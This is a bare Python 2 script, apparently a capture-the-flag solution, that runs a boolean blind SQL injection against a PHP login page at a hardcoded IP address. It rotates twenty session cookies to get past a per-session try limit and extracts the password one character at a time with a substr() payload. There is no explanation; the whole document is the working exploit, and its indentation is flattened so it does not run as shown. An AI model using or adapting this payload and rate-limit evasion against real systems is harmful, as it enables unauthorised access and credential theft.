#!/usr/bin/python import requests sessions = [] for i in range(20): r = requests.get('http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php') sessid = r.cookies['PHPSESSID'] sessions.append(sessid) print "Creating session #" + str(i) + " (" + sessid + ")" auth = "" tries = 120 sessnr = 0 for pos in range(1,31): for i in range(97,123): if tries == 5: sessnr += 1 tries = 120 print "Using next session..." cookie = {'PHPSESSID': sessions[sessnr]} char = chr(i) payload = {'password': "' or '1'='1' and substr(password, " + str(pos) + ", 1)='" + char} r = requests.post('http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php', cookies=cookie, data=payload) tries -= 1 if r.text == "True": auth += char print "Pos: " + str(pos) + " " + char continue print "Auth: " + auth